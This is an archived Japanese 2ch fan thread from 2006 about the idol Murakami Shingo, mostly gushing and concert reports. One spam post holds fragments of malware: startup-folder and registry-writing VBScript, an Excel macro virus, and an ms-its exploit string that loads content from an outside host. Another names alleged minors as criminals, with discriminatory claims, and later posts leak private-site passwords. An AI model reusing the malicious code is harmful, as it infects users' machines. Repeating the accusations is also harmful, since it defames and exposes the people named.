5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ファンタジスタで】にんにく議長@21【日本一】

1 :(´Д`)<祝・初ソロ紺ケテーイ:2006/11/04(土) 22:12:31 ID:In/6njY4
絶好調のくるくるデジパで 目指すは今更マイケル路線
9連紺をひっさげて 今日も行きます大阪太郎
今年もはぐれます 魅惑のダンサーマッキー刑事 
8万円で韓国だって行っちゃいます
二重人格からスーパーアイドルまでどぉんどぉんこい!
元気のもとは にんにくにん
ソロコン目玉も にんにくにん?

そんなあなたが好きさ議長
お互いマターリ ナスイヤダゴニャ

2 :(´Д`)<祝・初ソロ紺ケテーイ:2006/11/04(土) 22:13:01 ID:In/6njY4
議長担の心得
・ラジオはガッシで受信しろ
・議長の代わりに虫退治
・舞台は気合で席を取れ
・歌は心で歌うもの
・ダンスはおナルに陶酔しろ
・何があってもポジティブ気分で
・ファンレターはトイレで読みます
・「信五」です。「信吾」でも「慎吾」でもありません

3 :(´Д`)<祝・初ソロ紺ケテーイ:2006/11/04(土) 22:15:42 ID:In/6njY4
前スレ
【MWCS】エクステ議長@20【ゲロッパ】
http://tv7.2ch.net/test/read.cgi/jr/1147168311/

4 :(´Д`)<祝・初ソロ紺ケテーイ:2006/11/04(土) 22:17:40 ID:In/6njY4
過去ログ村上
【1】ttp://mentai.2ch.net/jr/kako/961/961166672.html
【2】ttp://mentai.2ch.net/jr/kako/962/962553910.html
【3】ttp://saki.2ch.net/jr/kako/962/962738152.html
【4】ttp://saki.2ch.net/jr/kako/974/974046593.html
【5】ttp://saki.2ch.net/jr/kako/979/979422268.html
【6】ttp://music.2ch.net/jr/kako/981/981387903.html
議長@電話1本出張MC【7】
ttp://tv.2ch.net/jr/kako/1020/10208/1020864435.html
議長@声は電波に乗って【8】
ttp://tv.2ch.net/jr/kako/1031/10316/1031661770.html
議長@肉野菜たっぷり村上信「五」【9】
ttp://tv2.2ch.net/test/read.cgi/jr/1035465874
【議長】マジでか!?は流行語?村上信五@10【軍医】
ttp://tv2.2ch.net/test/read.cgi/jr/1039694607

5 :ユー&名無しネ:2006/11/04(土) 22:18:49 ID:NW3lF1tK
【福岡中2男子】  遺書を無理やり書かせ「自殺させ」偽装した殺人同様の自殺事件

●犯罪者7人
川波 賢吾 ←黒幕  
         1学年上の3年。地元の有力者で同和。隠蔽工作をしてとっとと引越し済み。
         小学生時代には柔道。
         家族or親戚の川波慎太郎は九州電力柔道部。福岡県警とはズブズブの関係。
元木 一也 ←虐めの主犯
          中学受験に失敗。隣の甘木町(同和地区)から越境入学。
          家庭崩壊のため小学五年で粗暴化。いじめでストレス発散。失恋でさらにいじめがエスカレート。
          パチスロカイジ好き。パシリに万引き示唆
江藤 龍平 ←小学五年で元木と同じクラス。ギャング団を形成  
前田 翔  ←被害者と同じくバレーボール部
青木 昇  ←被害者と同じくバレーボール部。
綱島 明  ←確定
鄭 純平  ←ネットワーク人間。「ていもものずきやんねぇ」。モーホー。
◎1年次担任 田村教諭 ←今回の事件の責任を全て負わされる。実態はただのダメ教師。どうでもいい。

◎2年次担任 ←学校に籍のみ置いて実際は解同の活動に従事している加配教員&ヤミ専従

●学校&教委が隠蔽したいことは実は現担任のヤミ専従問題 (奈良の公務員問題と同じ)
 議員、知事は報道規制を行っている。福岡県県教委は小渕が現地調査をしたときも、被害者の住所電話番号も教えない。
 加害者の親たちは他の生徒保護者に「家に火をつける」と脅迫。

●事件後も別の生徒に繰り返す 同グループ 
男子生徒の自殺後、間もなくいじめグループが別の男子生徒を対象にしたいじめを始め、
見かねた他の同級生が保護者に相談し、保護者が学校側に通報した。
ttp://headlines.yahoo.co.jp/hl?a=20061103-00000011-mai-soci

6 :(´Д`)<祝・初ソロ紺ケテーイ:2006/11/04(土) 22:22:34 ID:jTV0lKoW
【議長】ファンレターはトイレに送って!村上信五@11【コロ助】
ttp://tv2.2ch.net/test/read.cgi/jr/1046017454
【脱日サロ】ホーム拡張営業中@村上議長12【オネェ】
ttp://tv2.2ch.net/test/read.cgi/jr/1051365360/
【髪スッキリ】どおしよおもない〜@議長13【信五デス】
ttp://tv2.2ch.net/test/read.cgi/jr/1060689901/
【栗】頼りにしてまっせ@議長14【桃】
ttp://tv4.2ch.net/test/read.cgi/jr/1069853982/
【モサカミ】ヒナチャン@議長の秘密15【チョンマゲ】
ttp://music4.2ch.net/test/read.cgi/jr/1081235021/
マジ刑事!声デカ!@はぐれ議長16
ttp://tv7.2ch.net/test/read.cgi/jr/1091426771/
全裸ラジ$議長17
ttp://tv7.2ch.net/test/read.cgi/jr/1103700188/
【シッカリ】花より議長@はぐれ1∞【チャッカリ】
ttp://tv7.2ch.net/test/read.cgi/jr/1113768356/
【波の中から】勇者議長@19【ほなおつ】
http://tv7.2ch.net/test/read.cgi/jr/1127887652/

7 :ユー&名無しネ:2006/11/04(土) 22:30:52 ID:jTV0lKoW
スレ立て乙です
たいした支援もできず、おまけに直リン申し訳_| ̄|○

前スレでも出てたがこれからもう少し早く立てないか?
950までにスレタイと>1を決めて980で立てるくらいの方がイイとオモ

8 :<body onload=window()>:2006/11/04(土) 23:06:13 ID:DRD2+yqs
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :ユー&名無しネ:2006/11/05(日) 23:31:21 ID:dlx2hBIx
>1
姐さんスレ立て乙です!

自分ユニ内他担ですがやんかのギチョ様にはハァ━━━*´Д`*━━━ン!!ですた
普段は散々毒を吐く友もギチョ様の美しさにビクーリしていました
最近ギチョ様テラ男前でウラヤマシスorz
スレ汚しスマソ

10 :ユー&名無しネ:2006/11/06(月) 01:26:18 ID:ugWVwZvK
>1
姐さん乙!
つ旦~

とりあえず新スレ記念に
もう最近のギチョサン全てにハァ━━━*´Д`*━━━━━ン!!!!

11 :ユー&名無しネ:2006/11/06(月) 01:28:46 ID:bEZKhzDP
>1
乙ポジティブ気分

>9
姐さんギチョ様って(ノ∀`)
でも正直やんかのギチョサンはテラ男前でカ●゙エかった能(*´Д`)

12 :ユー&名無しネ:2006/11/06(月) 01:50:31 ID:H9DIP+N+
>1
姐さん乙にんにくにん!

関係ないが前スレの1000は太郎にかけて
ウルトラマソタローのテーマなのか?(w

13 :ユー&名無しネ:2006/11/06(月) 01:57:51 ID:bEZKhzDP
>12
自分そのリズムで歌ってた(w
太郎なら地球護れるよね(・∀・)

14 :ユー&名無しネ:2006/11/06(月) 02:03:58 ID:eipIRV94
>12-13
層(ノ∀`)
思いついたんだが案外ゴロが良くて(w

15 :ユー&名無しネ:2006/11/06(月) 03:18:11 ID:zMkWGAiG
あのビズでカレンダーなんだよな
カレンダーwktk(*´Д`)

16 :ユー&名無しネ:2006/11/06(月) 07:52:40 ID:wWRG/W1P
>13
太郎が地球を護るという事は
ナスレンジャーと手を組む日も近いという事ですか


wktkwktk(・∀・)

17 :ユー&名無しネ:2006/11/06(月) 14:05:08 ID:Dm1csrxk
去年のやんかリピしてたら六甲おろしの
(*´Д`)来年こそは必ず日本一をとりましょおおおおおおお
て台詞の声がデカ杉て演歌歌手さん等が若干引いててワロタ(w

18 :ユー&名無しネ:2006/11/06(月) 18:59:12 ID:zMkWGAiG
温泉orz
今の髪型ならテラお色気そうなのに

19 :ユー&名無しネ:2006/11/06(月) 19:31:51 ID:ugWVwZvK
マッキーの入浴シーンがないなんてorz
ギチョサンヲタからしたら視聴率うなぎ昇りな瞬間なのに(w

20 :ユー&名無しネ:2006/11/06(月) 19:45:36 ID:bEZKhzDP
テンソンもうなぎ昇りなのにな残念(´・ω・`)
まあ刑事デラマに入浴シーン求める方がおかしいのかも知らんが(w

21 :ユー&名無しネ:2006/11/07(火) 13:43:06 ID:ySR4mDGS
(ヲ∀タ)太郎!太郎!
鳴り止まない太郎コールwktk

22 :ユー&名無しネ:2006/11/07(火) 17:42:47 ID:aToNwo39
ギチョサン追加大丈夫加納?

23 :ユー&名無しネ:2006/11/08(水) 09:45:11 ID:QzW1IgUn
当落がwktk過ぎて仕事にならナス
どうしてくれるんだギチョサン

24 :ユー&名無しネ:2006/11/08(水) 10:35:18 ID:7eNH+/sf
>23
同じく
でもドキュモからかける自分はすぐには繋がらナスビorz

25 :ユー&名無しネ:2006/11/08(水) 12:13:41 ID:8vaejmCC
>23
(*´∀`)ノシ

26 :ユー&名無しネ:2006/11/08(水) 17:15:18 ID:k/Kr41wW
黄昏時にはにんにくにん!
リンリンガンガルヨ(ノ∀`)


27 :ユー&名無しネ:2006/11/08(水) 19:18:32 ID:UqzWxpbn
落選orz
もう生きていけナスビorz

28 :ユー&名無しネ:2006/11/08(水) 20:13:44 ID:bbolYb61
>27
('A`) 人('A`)
団扇作る気満々だったのにorz
ギチョサン紺行ける姐さん、自分の分もにんにくにんしてきてホスィ

29 :ユー&名無しネ:2006/11/08(水) 20:29:56 ID:dAJ5wHEI
>28
自分にんにくにんしてくるよノシ
にん('A`) 人('A`) 肉
でよさげ?

30 :ユー&名無しネ:2006/11/08(水) 20:33:50 ID:w9fIuFBm
>29
姐さん自分の分もにんにくハッスルしてきて呉_| ̄|〇

31 :ユー&名無しネ:2006/11/08(水) 21:00:01 ID:8vaejmCC
>29
姐さん自分の分もヨロ!

32 :ユー&名無しネ:2006/11/08(水) 21:00:35 ID:dAJ5wHEI
>30
決めまスタ
落選姐さんの分も背負って団扇は
【ファンタジスタで】にん('A`) 人('A`) 肉【日本一】だぬ
ハッスルしてきまスル
初の松茸だノシ

33 :ユー&名無しネ:2006/11/08(水) 22:12:24 ID:wSohdj5C
>32
松茸トイレもお忘れなく(w

34 :ユー&名無しネ:2006/11/08(水) 23:18:45 ID:dAJ5wHEI
>33
忘れてた_| ̄|〇
太郎見てはりきってきばってきますヌ
ギチョサンのお肌ビズレポも忘れずにしますノシ

35 :ユー&名無しネ:2006/11/08(水) 23:34:09 ID:/wIRgg6l
自分も当選キタワァ(AA略
姐さん達の分までにんにくにんしてきますん

36 :ユー&名無しネ:2006/11/09(木) 00:36:28 ID:7EZNijLr
自分にもイブに当選キタワァ━━━*´Д`*━━━━━ン!!!!
テラ嬉シス(*´∀`)
気合い入れて楽しんできますん(`・ω・´)ゞ

37 :ユー&名無しネ:2006/11/09(木) 01:01:27 ID:GfQvaC8D
自分もギチョさん名義にも関わらず…_| ̄|〇
姐さん方あとは頼んだ

38 :ユー&名無しネ:2006/11/09(木) 02:10:38 ID:Dl5Z7Fcb
自分も全て落選ktkr
orz
当選姐さん達ステチなクリスマスを過ごしてきて呉
家で太郎団扇振りますんノシ

39 :ユー&名無しネ:2006/11/09(木) 07:52:47 ID:brdGhBLy
やっと確認終わって当選キタワァ(AAry
ダブリ出たので放出予定ですん
ここの姐さんたちに会えますようにナモナモ

40 :ユー&名無しネ:2006/11/12(日) 10:36:19 ID:EmBDUMBK
昨日のオーソレのギチョサン、服装のせいか胸板がかなりがっちりして見えた
2週連続でソロに触れてもらえてアリガタヤ(´人`)

41 :ユー&名無しネ:2006/11/12(日) 12:52:01 ID:6h0LoDyT
男前塾で真剣に話すギチョサンにハァ━━━━*´Д`*━━━━ン!!!!

42 :ユー&名無しネ:2006/11/13(月) 07:52:51 ID:Mz6KhkQG
豚(not相方切りでチャソでスマソ
今帝都ではぐれ再放送やってるんだがこれはギチョサン出てるのか能?

43 :ユー&名無しネ:2006/11/13(月) 10:52:52 ID:7mqM3g8s
>42
つ【テロ朝サイト】
若手刑事はギチョさんじゃないみたいだが

44 :ユー&名無しネ:2006/11/13(月) 11:29:39 ID:OOvTDJaB
>42
ギチョサンの前シリーズっぽい
若手は賀集利樹(2ネームry

45 :ユー&名無しネ:2006/11/13(月) 17:20:26 ID:1iPalLM0
ギチョサソ漫画でもオトコマエだよギチョサソ

46 :ユー&名無しネ:2006/11/13(月) 22:25:44 ID:Mz6KhkQG
>43-44
dです
調べもせずスマソorz
マッキーの世界観を知っとく為に見ておく事にしますたノシ

47 :ユー&名無しネ:2006/11/14(火) 14:46:23 ID:PQQiGiC3
>46
ええよええよー

48 :ユー&名無しネ:2006/11/14(火) 16:43:49 ID:TQEdCiut
はぐれの公表って去年はいつだったっけ?
木曜の重大発表がはぐれ公表だったら
翌日のタモステで話振られそうなのにな

49 :ユー&名無しネ:2006/11/15(水) 07:55:33 ID:9WdxUJLY
ギチョサンのスーツ姿ハァ━━━*´Д`*━━━ン!!
今時メズラな三ツ揃いハァ━━━━*´Д`*━━━━ン!!!!

50 :ユー&名無しネ:2006/11/15(水) 08:45:50 ID:WOYljT2R
スリーピースが似合ってしまうギチョサンだいしてる
日本一の男前は何でも似合ってしまうんですね

51 :ユー&名無しネ:2006/11/15(水) 09:39:09 ID:Vlp7SUD8
ギチョサンチャイナドレス着ちゃいなよギチョサン

52 :ユー&名無しネ:2006/11/15(水) 17:48:59 ID:ZAgBiz+s
衣装打ち合わせの時ギチョさんが〜ぽいって言ったのが慎吾くんぽいと聞こえたのは気のせいですか

53 :ユー&名無しネ:2006/11/16(木) 18:22:45 ID:8ChsM5rd
大阪太郎ばっかに意識がいってスカーリ忘れてたけど
ソロコンにブブブクルー*・゜゚・*:.。..。.:*・゜(n´Д`)n゚・*:.。. .。.:*・゜゚・*?

54 :ユー&名無しネ:2006/11/16(木) 18:29:14 ID:+atcIkX3
ギチョサンのミサンガ案外きれいなナス色だった

55 :ユー&名無しネ:2006/11/16(木) 19:34:34 ID:92Ghk7dC
姐さん方、このナス色ミサンガをつけてソロコンで
はっちゃけようジャマイカ(w
ギチョサンのスタイルがよくわかる衣装がたくさんありますように(-人-)


56 :ユー&名無しネ:2006/11/17(金) 01:04:14 ID:PDa9V0o7
むしろ裸でおながいしたい(w

57 :ユー&名無しネ:2006/11/17(金) 11:52:15 ID:EETaNWNd
むしろ季節を無視して半パンでおながいしますナモナモ

58 :ユー&名無しネ:2006/11/17(金) 12:19:25 ID:ek6DnusO
ひらに伝説のスケスケビニール衣装かりちゃいなyo!
もちろん中のパンシは紫でヨロ

59 :ユー&名無しネ:2006/11/17(金) 14:26:29 ID:J1/okUKp
ギチョサンはもっと色気をアピールしてもいいとオモーの
あの体でセクシーさを出さないなんてもったいな(ry

60 :ユー&名無しネ:2006/11/17(金) 15:37:05 ID:ve56Qt/4
ギチョサンに愛の賛歌唄ってホスィ

勿論全裸で

61 :ユー&名無しネ:2006/11/17(金) 16:05:24 ID:t+jc048s
全裸は松茸的にマズそうな気がする
☆型ニプレスとチェリーで隠してはどうだろう

62 :ユー&名無しネ:2006/11/17(金) 16:58:56 ID:499s//jO
今でも充分セクシーなのにこれ以上セクシーになったらギチョサン紺はR18ですん
14チャイな姐さんたちは見られなくなるとオモーノ(ノ∀`)

63 :ユー&名無しネ:2006/11/17(金) 19:26:13 ID:R7DlOFN7
無難なライン内なら7分袖ナモナモ

64 :ユー&名無しネ:2006/11/17(金) 21:03:46 ID:ve56Qt/4
眼力ハァ━━━━*´Д`*━━━━ン!!!!
小窓に映るギチョサンもハァ━━━━*´Д`*━━━━ン!!!!
お喋りもたくさん出来てたしもうお腹イパーイ

65 :ユー&名無しネ:2006/11/17(金) 21:42:40 ID:bxOXZsth
衣装がカバエくて満足(*´∀`)

66 :ユー&名無しネ:2006/11/17(金) 23:10:31 ID:U2TxXrJ5
小窓のギチョサン眼力スゴス

67 :ユー&名無しネ:2006/11/18(土) 03:08:42 ID:cK5qDkB6
矢部のパクリ

68 :ユー&名無しネ:2006/11/18(土) 12:51:35 ID:JNkM9Jcz
肩たたきの歌ハァ━━━━*´Д`*━━━━ン!!!!

69 :ユー&名無しネ:2006/11/18(土) 18:57:19 ID:+JGsax8C
肩たたきの歌ってどんなだ?
トントントントン言ってたって事なんだろうか(w

70 :ユー&名無しネ:2006/11/18(土) 19:06:14 ID:BmEIVwaM
母さんお肩を叩きましょう〜タントンタントンタントントン

という歌かとオモてたのだが違うのだろうか

71 :ユー&名無しネ:2006/11/18(土) 20:17:40 ID:T0HGuA+d
>70
69じゃないがそれっぽいな
自分トントントンひげじいさんだと思ってた(ノ∀`)

72 :ユー&名無しネ:2006/11/18(土) 20:55:32 ID:o2dVqXQ1
(*´Д`)マルチャソお肩を叩きましょ〜
とか唄ってたのかなハァ━━━━*´Д`*━━━━ン!!!!

73 :ユー&名無しネ:2006/11/18(土) 23:45:11 ID:QxnoLFok
ぷいぷいみれないからよく分からんのだが
ぷいぷいで衣装に意見だしてたらしいけど
その意見が勝俣タン(2ネムry丈パンツなのか?

74 :ユー&名無しネ:2006/11/18(土) 23:54:06 ID:jjewCBVv
ぷいぷい

75 :ユー&名無しネ:2006/11/20(月) 01:21:30 ID:WDK3dBQL
(#´Д`)なんっっっでそんなにアフォやねん!
ギチョサンテラワロス(w

76 :ユー&名無しネ:2006/11/20(月) 20:12:30 ID:gih3IbwK
初オーソレギチョさん
黒髪オールバック一括りで一筋乱れた髪がテラセクシーダタ
デコも含めた男前全開で直視できなかったYO!

77 :ユー&名無しネ:2006/11/20(月) 21:36:55 ID:Y5PeLjBG
初オーソレおめ!
ひっつめ髪でもオカンみたいな感じじゃなかったのかな?

78 :ユー&名無しネ:2006/11/21(火) 13:18:45 ID:kK9u0VW4
逆にギチョサン金様みたいだったのでは?

79 :ユー&名無しネ:2006/11/21(火) 19:28:00 ID:8eu6lQCO
>78
とりあえず金様に土下座しに行こうか

80 :ユー&名無しネ:2006/11/22(水) 19:12:50 ID:5vaQdWbX
_(´Д`;)|\_

81 :ユー&名無しネ:2006/11/23(木) 00:08:04 ID:hdkCLp/q
亀ですがオソレレポを少々
3本目テーマはコロッケ ゲストは彦摩呂タソ
ガイシュツのオールバックポニーテールで
金様似かどうかはわからんが男っぽい感じでテラカコヨス
一筋落ちてたサイドの髪を直す手つきにハァ━━━*´Д`*━━━ン!!
白いパーカーのフードの紐がなぜか金色
お肌は荒れ気味ですたがメイクでカバーできる程度

関風もうすぐ発売ですねという流れで
藤本アナから「どんなんでしたっけ?歌ってみて下さいよ」とふられ
生歌キチャウーーーー?と客席に期待と緊張が走るが
あ、今かかってますね流して下さってありがとうございます!
というテイに持っていったギチョさんの手腕に脱帽
という訳でOAお楽しみに(w
コロッケ試食の際まだカメラ回ってないのに食べようとするモモコ姐さんに
「なんで我慢できひんの!大人やのに!」とつっこんだり
彦摩呂タソと仲良さげに雑談したり
音出るくらい肩を勢いよくドツいてた姿が
いつもながら頼もしい限りですた

82 :ユー&名無しネ:2006/11/23(木) 01:10:56 ID:6OQug4Q8
>81
姐さんレポd!
彦摩呂タソ楽しみだ
サイドの髪を直す手つきは想像するだけで
ハァ━━━*´Д`*━━━ン!!ですん(w


83 :ユー&名無しネ:2006/11/24(金) 22:07:44 ID:YqmnmmgM
ギチョサン仕様のバイクテラ楽しみ(*´∀`)

84 :ユー&名無しネ:2006/11/24(金) 23:24:18 ID:2uBw2IjM
副将兄さんのヒナ呼びハァ━━━━*´Д`*━━━━ン!!!!

85 :ユー&名無しネ:2006/11/25(土) 16:14:51 ID:T9tVs3Ms
ギチョサァ━━━━ *´Д`* ━━━━ン!!

86 :ユー&名無しネ:2006/11/25(土) 18:40:05 ID:77Lh8Sqz
撮られたがりのギチョサンハァ━━━━*´Д`*━━━━ン!!!!

87 :ユー&名無しネ:2006/11/25(土) 18:58:56 ID:zE3APxif
三つ揃えオッサ━━━━*´Д`*━━━━ン!!!!

88 :ユー&名無しネ:2006/11/25(土) 20:08:54 ID:T9tVs3Ms
IDにムラカミシンゴキテタワァ・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*

89 :ユー&名無しネ:2006/11/27(月) 00:01:25 ID:CVuF4JcN
男前を目指せ聞いたけど本人も不安感じてるんだな
周りに散々「大丈夫?」とか言われてワロテたけど
甘受に「助けてな」って言ったり「2時間踊り続けるか喋り続けるか」
悩んだみたいだし
ポジティブだからあんま悩んでないかともオモテたけど
やっぱり初ソロだもんな
がんがれギチョさん!

90 :ユー&名無しネ:2006/11/27(月) 11:42:47 ID:Bl6CQ/og
ギチョサン男前

91 :ユー&名無しネ:2006/11/27(月) 19:30:55 ID:SITZcX3/
ギチョサンはポジティブな反面繊細な面もある希ガス
なんにせよギチョサンなら最高のソロコンをやってくれると信じてる


92 :ユー&名無しネ:2006/11/27(月) 22:34:25 ID:1M9PXqY3
ギチョサン大丈夫なのギチョサン
連続18公演は働きすぎだよギチョサン…_| ̄|○

93 :ユー&名無しネ:2006/11/28(火) 02:13:45 ID:gmdf6qRx
オジイチャソはそんなにもギチョサンの体力をかってくれてるんだ
と解釈してポジティブに楽しもう
これを乗り切ったらまた一つギチョサンの男前度も上がるよきっと

94 :ユー&名無しネ:2006/11/28(火) 11:31:49 ID:A4X7Zb/1
がんばって
としか言えませんが
がんばって下さい

95 :ユー&名無しネ:2006/11/29(水) 01:55:59 ID:jzhSD6vi
4つ年上の彼女とは別れたの?

96 :ユー&名無しネ:2006/12/01(金) 01:10:52 ID:39bKgRrS
ご本家ヒナ様ボログにギチョサンの名前出た(w

97 :ユー&名無しネ:2006/12/01(金) 17:36:42 ID:VusyltSf
年末デラマサイト更新
杉本(2ネームry様に振り回されるギチョサンハァ━━━━*´Д`*━━━━ン!!!!

98 :横見:2006/12/02(土) 00:44:28 ID:vgIjrOWI
村上信五☆
http://id19.fm-p.jp/19/hayapika/
パスワードがかかってるけど、教えちゃいます
materedって入れてねv

99 :ユー&名無しネ:2006/12/02(土) 21:39:00 ID:oQiDz7uq
ティシャツ

100 :ユー&名無しネ:2006/12/03(日) 09:56:00 ID:GP6c/tGR
ヘンブサのキーボードギチョサンハァ━━━━━━*´Д`*━━━━━ン!!

101 :ユー&名無しネ:2006/12/03(日) 12:56:17 ID:9XWl8fYc
キーボード、マジデカ?
ビズや髪型はどうなんだろうか
変化ありますたか?

102 :ユー&名無しネ:2006/12/03(日) 18:12:25 ID:EU3mP5nZ
ギチョサン兵SP出演オメ!
ヘンリーとのテレフォンBOXwktkして待ってます

103 :ユー&名無しネ:2006/12/04(月) 00:20:15 ID:0bBSxqcr
ビズは髪が若干伸びていたぐらいで特に変化はナス
キーボードギチョサンはマイクがあるにはあるがキーボードに必死でマターク歌わず(w
でも鍵盤を弾くギチョサンの指テラモエス(*´Д`)
ソロ紺組の3人曲はギチョサンはジャズ担当で
白スーツに赤シャツでジャジーに踊る姿にハァ━━━━*´Д`*━━━━ン!!!!
新曲の衣装のノースリベスト?で二の腕に何か巻いてて二の腕(*´Д`)モエー
更に前を肌蹴た時の胸板腹筋ハァ━━━━*´Д`*━━━━ン!!!!
3日2部のDJヒーモは素直にギチョサンスゴスでした(w

104 :ユー&名無しネ:2006/12/04(月) 19:21:09 ID:CP5IcZnH
隣板他担ですがめんたい紺に参加しまして
ギチョサンに落ちてしまいました
ソロ紺3人組での白スーシでのセクチーダンス最高でした
ギチョサンオデリがうまいのですね
自分が入った回にヒーモだったんですが笑いすぎて涙出ました
と同時にヘンリサンのふりすべてに答えるギチョサンに感動すら覚えました

横蟻も誘われそうなので楽しみにしております

スレ汚し失礼しました
巣に帰ります

105 :ユー&名無しネ:2006/12/05(火) 01:11:36 ID:o5GusilJ
>104姐さん
いらっさいませ!
ファンタジスタへようこそ(w
ギチョサンの魅力を存分に感じていただけたようで嬉しい限りですん
またいつでもお待ちしてますのでヨロ

106 :ユー&名無しネ:2006/12/05(火) 02:08:34 ID:Ao+SKV3u
ヒーモなギチョサンが男前杉て
ハァ━━━━*´Д`*━━━━ン!!!!

107 :ユー&名無しネ:2006/12/05(火) 07:25:27 ID:UgRieYyF
>(ヒーДモ)いーままーでーみーたこーとーなーいーσ(´Д`)オレっ!
萌えチヌそうだよギチョサン..._ト ̄|○

108 :ユー&名無しネ:2006/12/05(火) 11:46:55 ID:kd6Hgj1n
しうまい入るんだが今からwktkしすぎで吐きそうだorz

109 :ユー&名無しネ:2006/12/06(水) 04:24:13 ID:qpIT5TAS
ヒナコンチケを定価で譲ります!!詳しくは↓↓
http://id38.fm-p.jp/27/hayapikavv/
http://id28.fm-p.jp/42/vuvub/
http://id35.fm-p.jp/30/kanoan/
のどれかまで☆
パスワードかかってますケド、nyakっていれてもらえたら入れます!!メールボックスからメール下パィ!!!

110 :ユー&名無しネ:2006/12/06(水) 04:52:38 ID:qpIT5TAS
あのヨコヒナも認めた!!大阪太郎のオフィシャル小説(笑)
http://id31.fm-p.jp/book/page.php?uid=kano8cha&dir=26&bnum=13&num=4&mem_pw=nyak&u_name[1]=&u_name[2]=&u_name[3]=&u_name[4]=&no=2
超面白いから読んでみて☆☆

111 :ユー&名無しネ:2006/12/06(水) 19:01:34 ID:rlQnFNEx
今回のギチョサン的見所

・キーボードを弾く指
・衣装はだけた時の腹筋
・関風衣装からチラ見する脛毛
・(´Д`)僕のモノにしてもいい?
・(´Д`)Explosion!

112 :ユー&名無しネ:2006/12/06(水) 21:28:56 ID:yqvvAHuj
・(´Д`)僕の物にしてもイイ?

kwsk

113 :ユー&名無しネ:2006/12/07(木) 03:09:16 ID:BOAI7i1E
>112
通りすがりで曖昧なんだが
班長アゴマルとの曲のソロ部分の歌詞だったような

114 :ユー&名無しネ:2006/12/07(木) 03:15:51 ID:vgIwhlF2
俺様の俺なきはガイシュツ?

115 :ユー&名無しネ:2006/12/07(木) 06:54:16 ID:7Bu8Tf34
>114
kwsk

116 :ユー&名無しネ:2006/12/07(木) 08:02:43 ID:lJLefbXw
>115
114じゃないけど
波の俺様日記にギチョサンの名前が出てるよ

ギチョサン3人曲の自分パートを作詞したんだな
もっと歌詞ちゃんと聞けばヨカタ

117 :ユー&名無しネ:2006/12/07(木) 12:33:23 ID:WUAYvkh0
食をテーマにしてて言うと引かれる裏テーマがあるって言われると
裏テーマは女だなとマミチャソしてみる(w

118 :ユー&名無しネ:2006/12/07(木) 12:46:09 ID:mXN6x4k7
このスレ見てると紺が楽しみで楽しみで
ギチョサンキーボードwktk

119 :ユー&名無しネ:2006/12/07(木) 13:08:27 ID:9blUmoXo
ギチョサン作詞だったのか!
裏テーマはまぁ女だろうな(w
だとすると>111の歌詞の
(´Д`)今ここにあるものはWho's foods? 僕のものにしてもいい?
がテラ男前過ぎてハァ━━━━━━*´Д`*━━━━━ン!!

120 :ユー&名無しネ:2006/12/07(木) 15:17:30 ID:tV65es22
キーボードハァ━━━━*´Д`*━━━━ン!!!!
作詞ハァ━━━━*´Д`*━━━━ン!!!!
僕ハァ━━━━*´Д`*━━━━ン!!!!
ギチョサンハァ━━━━*´Д`*━━━━ン!!!!

121 :ユー&名無しネ:2006/12/07(木) 18:23:19 ID:Ofk3eyXK
あの曲それぞれが作詞担当ダタのか
たしかに3人とも詞のテイスト違ってた
細かくは覚えてないが意味深な歌詞だなと感じてたよギチョサン

122 :ユー&名無しネ:2006/12/07(木) 19:46:26 ID:Zo2RK6kK
自分最初からオナゴへのラブソングだと思って聴いてたのに裏テーマだったとは(w

123 :ユー&名無しネ:2006/12/08(金) 01:41:01 ID:unKbZ9x3
はなまるカフェキタワァ*・゜゚・*:.。..。.:*・゜(n´v`)η゚・*:.。. .。.:*・゜゚・*!!!!
殺伐写真テラwktk

124 :ユー&名無しネ:2006/12/08(金) 02:38:39 ID:6aNq9SgR
ギチョサンがはなまるに出る日が来るなんて
テラwktk
ビズ最強でありますようにナモナモ(-人-)

125 :ユー&名無しネ:2006/12/08(金) 12:43:24 ID:o5RdeI4g
全国で朝から男前を拝めるなんてwktk
奥様達の心を鷲掴みしてしまいそうだ能

126 :ユー&名無しネ:2006/12/08(金) 15:11:44 ID:2dL/MFG2
>125ギチョサン乙
大阪太郎口ずさみながら登場してクレ

127 :肝いサイト撲滅にご協力を!!!!!:2006/12/08(金) 20:03:45 ID:Hgn3aMRy
今までの歴史を振り返ろう!
『』内はパスワード
〜登場人物〜
ずば抜けた人気、携帯サイトとは思えない文章力と作品の質はヨコヒナ界NO.1ラブアンリミテッド管理人ナカヤマ
ちょっと自分に酔ってる感が漂うけれど、切ないお話を書かせたら右に出る者はいませんバース管理人横見
信者の数は圧倒的。名前を変えて隠してるつもりらしいが正直バレバレ元有名オリキマリーかの
おまけのグラネートアメユキ

もはや敵無しだと思われていた彼女達のサイトが晒された!そして合同サイト立ち上げる。

一番最初の合同サイト→http://id23.fm-p.jp/41/hgotui/パスワード『nyak』(即晒されて移転)
移転先のサイト→http://id33.fm-p.jp/44/nasuseme/『yakn』(またしても即晒されるw)
連日の晒しで再び請求制に→http://id28.fm-p.jp/43/maikelukayo/
請求後の新サイト→http://id28.fm-p.jp/45/takatukitaro/『matered』(また晒される)
